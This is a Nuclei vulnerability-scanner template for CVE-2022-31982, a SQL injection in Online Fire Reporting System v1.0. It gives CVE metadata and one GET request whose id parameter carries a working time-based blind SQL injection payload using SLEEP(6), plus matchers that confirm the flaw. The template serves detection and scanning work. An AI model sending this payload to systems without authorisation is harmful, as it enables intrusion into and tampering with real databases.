nuclei-templates/http/cves/2022/CVE-2022-31982.yaml

43 lines
1.7 KiB
YAML

id: CVE-2022-31982
info:
name: Online Fire Reporting System v1.0 - SQL injection
author: theamanrawat
severity: high
description: |
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/view_request&id=.
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://github.com/k0xx11/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-8.md
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-31982
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2022-31982
cwe-id: CWE-89
epss-score: 0.00609
epss-percentile: 0.76244
cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
vendor: online_fire_reporting_system_project
product: online_fire_reporting_system
tags: cve,cve2022,sqli,online-fire-reporting
http:
- method: GET
path:
- "{{BaseURL}}/admin/?page=requests/view_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "Request Detail")'
condition: and
# digest: 4b0a00483046022100b815ec6c0854374b09761f0b8e1875371039d28f5ff1037925f101040108f592022100f41d69d7158ae7362c1989645853aa3f360f604863f5ca6acfb05aaa1bfc1935:922c64590222798bb761d5b6d8e72950